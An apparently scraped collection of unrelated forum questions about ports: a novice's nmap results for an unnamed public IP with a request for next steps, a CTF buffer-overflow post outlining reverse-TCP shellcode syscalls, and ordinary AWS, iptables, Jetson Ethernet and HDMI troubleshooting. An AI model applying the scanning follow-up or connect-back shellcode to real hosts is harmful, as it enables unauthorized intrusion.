Port Scanning: Question about next steps after Zenmap port scan

I am very new to offensive security

I have done a nmap scan on a public IP, its showing 4 ports open and the OS is undetectable, I have no idea how to proceed further, I appreciate any next steps further in this case. Below is a snippet from nmap output:

Not shown: 995 closed ports PORT     STATE    SERVICE      VERSION 25/tcp   filtered smtp 135/tcp  filtered msrpc 139/tcp  filtered netbios-ssn 445/tcp  filtered microsoft-ds 6009/tcp filtered X11:9  Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: ISS Proventia GX3002 firewall (Linux 2.4.18) (97%), Linux 2.6.22 (Debian 4.0) (97%), CMI Genus NEMA terminal (95%), D-Link DGS-1210 switch (95%), D-Link DI-604 wireless broadband router (95%), Efficient Networks SpeedStream 4100 ADSL router (95%), FreeBSD 6.1-RELEASE (95%), IBM i 6.1 (95%), Cobalt Qube 2700WG (Linux 2.0.34) (95%), Linux 2.4.20 (95%) No exact OS matches for host (test conditions non-ideal). 

Reverse TCP – Bind to a specific port

So, I’m trying to solve a CTF challenge that involves exploiting a remote service. The service doesn’t check for the size of the input and there is a buffer overflow vulnerability. However, before I can hijack the control flow to my shellcode, the program closes the connection. So, I’m trying to have my shellcode connect back to me. A small hurdle is that the server allows outbound connections only through port 4444. So, my shellcode does the following

  1. socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
  2. bind(socket_fd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16)
  3. connect(socket_fd, {sa_family=AF_INET, sin_port=htons(port_no), sin_addr=inet_addr("ip")}, 16)

I am trying to get a reverse TCP session and I believe by binding to port 4444 the outbound connection will go through 4444. While the exploit works on my local system, the remote exploit does not work. Any thoughts on what Im missing or what I should be considering? Thanks!

How can I give a network load balancer (of any type) access to a port on a machine without opening that port to an entire VPC?

Is it possible to make an AWS load balancer for a non-HTTP port allowed to access a specific port on a host without opening that port open to the entire VPC’s subnet? I seem to remember reading that this might be possible with an IAM policy based around specific resources or something like that.

As you create a non-classic network load balancer it says: ” The security groups for your instances must allow traffic from the VPC CIDR on the health check port.”

Which is ok, but just barely since this service really doesn’t have much/any authentication.

Isn’t there a way this can be done with IAM permissions instead of a security group? I was reading about AWS firewall security somewhere and they mentioned that sometimes you can use an IAM policy, sometimes even a cross-account IAM policy to connect to the machines behind the firewall.

Any suggestions? I can definitely deploy more machines or AWS stuff.

How to redirect a port range on a load balancer

I’m a little new to this and trying to figure this out. I have 3 web servers running Ubuntu 16.04 and Apache2. One of the web servers will serve as a load balancer for the other two. I have the load balancing part correct, but I am trying to set this up where the port range 60000-65000 on the load balancer is redirected to the web servers on port 80. My guess is that this is done using iptables but that’s just a guess. Has anyone implemented this before? Thanks in advance.

Ethernet port missing in Jetson TX2

I have a Connect Tech Rudi TX2 device that came with Ubuntu 16.04 installed and it had two physical Ethernet ports eth0 and eth1 (they also worked).

After upgrading the Jetson platform to a newer version and flashing Connect Tech’s BSP there’s now only one Ethernet interface visible when I run ifconfig.

Is there a config file somewhere where you can enable or disable network interfaces?

Edit: The other Ethernet port is not enabled in the sense it seems to be completely dead, not just a /etc/network/interfaces thing.

suddenly my hdmi port stopped working

suddenly my hdmi port stopped working when i tried $ xrandr Screen 0: minimum 320 x 200, current 1920 x 1080, maximum 8192 x 8192 eDP-1 connected primary 1920×1080+0+0 (normal left inverted right x axis y axis) 309mm x 173mm 1920×1080 60.01*+ 60.01 59.97 59.96 59.93 48.01
1680×1050 59.95 59.88
1600×1024 60.17
1400×1050 59.98
1600×900 59.99 59.94 59.95 59.82
1280×1024 60.02
1440×900 59.89
1400×900 59.96 59.88
1280×960 60.00
1440×810 60.00 59.97
1368×768 59.88 59.85
1360×768 59.80 59.96
1280×800 59.99 59.97 59.81 59.91
1152×864 60.00
1280×720 60.00 59.99 59.86 59.74
1024×768 60.04 60.00
960×720 60.00
928×696 60.05
896×672 60.01
1024×576 59.95 59.96 59.90 59.82
960×600 59.93 60.00
960×540 59.96 59.99 59.63 59.82
800×600 60.00 60.32 56.25
840×525 60.01 59.88
864×486 59.92 59.57
800×512 60.17
700×525 59.98
800×450 59.95 59.82
640×512 60.02
720×450 59.89
700×450 59.96 59.88
640×480 60.00 59.94
720×405 59.51 58.99
684×384 59.88 59.85
680×384 59.80 59.96
640×400 59.88 59.98
576×432 60.06
640×360 59.86 59.83 59.84 59.32
512×384 60.00
512×288 60.00 59.92
480×270 59.63 59.82
400×300 60.32 56.34
432×243 59.92 59.57
320×240 60.05
360×202 59.51 59.13
320×180 59.84 59.32
DP-1 disconnected (normal left inverted right x axis y axis) HDMI-1 disconnected (normal left inverted right x axis y axis) tried to reboot and check but didn’t woro